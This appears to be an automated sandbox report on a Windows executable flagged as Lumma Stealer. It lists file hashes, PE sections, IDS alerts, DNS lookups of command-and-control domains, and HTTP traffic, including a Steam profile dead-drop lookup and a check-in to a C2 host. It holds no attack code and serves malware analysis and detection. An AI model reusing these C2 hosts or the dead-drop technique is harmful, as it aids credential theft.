                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.6.<./.P.i.
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4542
                                                                                                        Entropy (8bit):4.426276338322636
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwWl8zs8Jg77aI9TgWpW8VYcYm8M4JjlFz2+q8CWNT0qrd:uIjf6I7dZ7VgJ/2mNT0qrd
                                                                                                        MD5:FEB270D468628ED583FAF53FC33F1E17
                                                                                                        SHA1:C1E8DD678D935EE2BB694A6BF36701D79D33540B
                                                                                                        SHA-256:3B6F72A2FBF2F7E1097EB1B17A5A5A2DDB3E6A0D82F5F81C529FF88193E81AD8
                                                                                                        SHA-512:74A0B1B65A7095521BF8DC417C1F79B32207AD3E1332F4F4F68CD1E41778CF1779414E842697B45B6E7C15A12BC04E8D80B6646A0AD94E9A7886CF40A6D2B87A
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542083" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1835008
                                                                                                        Entropy (8bit):4.421335979510864
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTNWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:svloTNW+EZMM6DFy403w
                                                                                                        MD5:0C5B45E41E81EB756F10036783636E3D
                                                                                                        SHA1:ADC438568E93B0822B86BF0D7B7183C1E373D434
                                                                                                        SHA-256:9086925B20BA8F643522CA24E013701E54FE051595A01BD43CD5A3DAE9ACFE4B
                                                                                                        SHA-512:80F7817D6A7D506958482636C9C9789556BB7CE44D32544A89BE6D17BA876F3D14DCF0F7FFA17325C18786E6FC3F1B71900FB60B41C71E05095BE3C11ADD75BA
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................H.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.553881873751343
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:file.exe
                                                                                                        File size:2'960'896 bytes
                                                                                                        MD5:721993ac48789fdb695ef35383b11c82
                                                                                                        SHA1:383b3cdf3da4dbd15c5510664739a547dbb6ad20
                                                                                                        SHA256:982c7aeeb92f939d4c64ecf5da251ab5a8b1ff854f627ec324f7b70c0a6f2d88
                                                                                                        SHA512:52a247dd7192f16570c321dc9da1cf54fef7e049eb141e1feb045b1a7a28592912643a02ff3480700aefb9ba7c054183bb5677a976bcfb3369484b297b191b76
                                                                                                        SSDEEP:49152:ogCXuQ9J20TL7NrLxDOsn7YWpRCa26L14bvFiG2Xa3:ogCXH720rNrLxDxHpRvnJmr3
                                                                                                        TLSH:CAD54B95A80572CFD49A1778942BCDC25B9E43B9472514C3E87CE4BABEB3CC435BAC24
                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@...........................0.......-...@.................................W...k..
                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                        Entrypoint:0x70b000
                                                                                                        Entrypoint Section:.taggant
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                        Instruction
                                                                                                        jmp 00007F18F11F2C5Ah
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        0x10000x5d0000x25e002ca551e2b47c8ab64d121698f36b69e0False0.9995165532178217data7.978527192652883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        eypfpszy0x600000x2aa0000x2a96000a182c2e2a91fa4ac12e2e1dc9aae0f2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        lshfcwfx0x30a0000x10000x600da744237616abeef44393b73796b5009False0.63671875data5.440375389666205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .taggant0x30b0000x30000x2200172f26dce0c8c6500f4ac0d3c5cd4a4eFalse0.06307444852941177DOS executable (COM)0.7754072603900605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        DLLImport
                                                                                                        kernel32.dlllstrcpy
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-10-13T21:40:06.193421+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.5599421.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.216013+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.5566441.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.228324+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.5537891.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.239904+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.5608781.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.250033+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.5553831.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.269956+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.5571541.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.282925+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.5563431.1.1.153UDP
                                                                                                        2024-10-13T21:40:06.298702+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.5494701.1.1.153UDP
                                                                                                        2024-10-13T21:40:07.792153+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549704104.102.49.254443TCP
                                                                                                        2024-10-13T21:40:08.579341+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.53.8443TCP
                                                                                                        2024-10-13T21:40:08.579341+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.53.8443TCP
                                                                                                        2024-10-13T21:40:09.631118+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.53.8443TCP
                                                                                                        2024-10-13T21:40:09.631118+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.53.8443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 13, 2024 21:40:06.325587988 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:06.325615883 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.325732946 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:06.327485085 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:06.327500105 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.049123049 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.051424026 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.125323057 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.125354052 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.126472950 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.169991016 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.365243912 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.407426119 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.792246103 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.792313099 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.792346001 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.792375088 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.792392969 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.792402983 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.792413950 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.792434931 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.792471886 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.922528028 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.922601938 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.922626972 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.922641993 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.922730923 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.922730923 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.929260969 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.929339886 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.929357052 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.929410934 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.929419994 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.929501057 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.929553032 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.931030989 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.931051970 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.931066036 CEST49704443192.168.2.5104.102.49.254
                                                                                                        Oct 13, 2024 21:40:07.931081057 CEST44349704104.102.49.254192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.950126886 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:07.950205088 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.950299025 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:07.950730085 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:07.950764894 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.439785004 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.439867973 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.443527937 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.443543911 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.443877935 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.445600033 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.445666075 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.445842028 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579336882 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579406977 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579446077 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579463005 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.579479933 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579493046 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579524040 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.579586029 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.579664946 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.580277920 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.580300093 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.580315113 CEST49705443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.580322027 CEST44349705104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.688138962 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.688262939 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:08.688433886 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.688844919 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:08.688874006 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.160666943 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.160801888 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.161999941 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.162045956 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.162545919 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.163805008 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.163846016 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.163928032 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.631134987 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.631485939 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.631577969 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.632092953 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.632139921 CEST44349706104.21.53.8192.168.2.5
                                                                                                        Oct 13, 2024 21:40:09.632172108 CEST49706443192.168.2.5104.21.53.8
                                                                                                        Oct 13, 2024 21:40:09.632188082 CEST44349706104.21.53.8192.168.2.5
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 13, 2024 21:40:06.193420887 CEST5994253192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.211891890 CEST53599421.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.216012955 CEST5664453192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.225471020 CEST53566441.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.228323936 CEST5378953192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.237576008 CEST53537891.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.239903927 CEST6087853192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.248651981 CEST53608781.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.250032902 CEST5538353192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.267270088 CEST53553831.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.269956112 CEST5715453192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.280700922 CEST53571541.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.282924891 CEST5634353192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.296444893 CEST53563431.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.298702002 CEST4947053192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.308698893 CEST53494701.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:06.313383102 CEST5081853192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:06.320570946 CEST53508181.1.1.1192.168.2.5
                                                                                                        Oct 13, 2024 21:40:07.933787107 CEST6479853192.168.2.51.1.1.1
                                                                                                        Oct 13, 2024 21:40:07.949453115 CEST53647981.1.1.1192.168.2.5
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Oct 13, 2024 21:40:06.193420887 CEST192.168.2.51.1.1.10x3befStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.216012955 CEST192.168.2.51.1.1.10xfb8cStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.228323936 CEST192.168.2.51.1.1.10xa78eStandard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.239903927 CEST192.168.2.51.1.1.10xeacbStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.250032902 CEST192.168.2.51.1.1.10x6ef5Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.269956112 CEST192.168.2.51.1.1.10x59b4Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.282924891 CEST192.168.2.51.1.1.10x72dbStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.298702002 CEST192.168.2.51.1.1.10x6e2eStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.313383102 CEST192.168.2.51.1.1.10xed05Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:07.933787107 CEST192.168.2.51.1.1.10x2db4Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Oct 13, 2024 21:40:06.211891890 CEST1.1.1.1192.168.2.50x3befName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.225471020 CEST1.1.1.1192.168.2.50xfb8cName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.237576008 CEST1.1.1.1192.168.2.50xa78eName error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.248651981 CEST1.1.1.1192.168.2.50xeacbName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.267270088 CEST1.1.1.1192.168.2.50x6ef5Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.280700922 CEST1.1.1.1192.168.2.50x59b4Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.296444893 CEST1.1.1.1192.168.2.50x72dbName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.308698893 CEST1.1.1.1192.168.2.50x6e2eName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:06.320570946 CEST1.1.1.1192.168.2.50xed05No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:07.949453115 CEST1.1.1.1192.168.2.50x2db4No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                        Oct 13, 2024 21:40:07.949453115 CEST1.1.1.1192.168.2.50x2db4No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                        • steamcommunity.com
                                                                                                        • sergei-esenin.com
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.549704104.102.49.2544435256C:\Users\user\Desktop\file.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-13 19:40:07 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Host: steamcommunity.com
                                                                                                        2024-10-13 19:40:07 UTC1870INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                        Cache-Control: no-cache
                                                                                                        Date: Sun, 13 Oct 2024 19:40:07 GMT
                                                                                                        Content-Length: 34837
                                                                                                        Connection: close
                                                                                                        Set-Cookie: sessionid=7bbc4841cbad9ba1a13fca42; Path=/; Secure; SameSite=None
                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                        2024-10-13 19:40:07 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
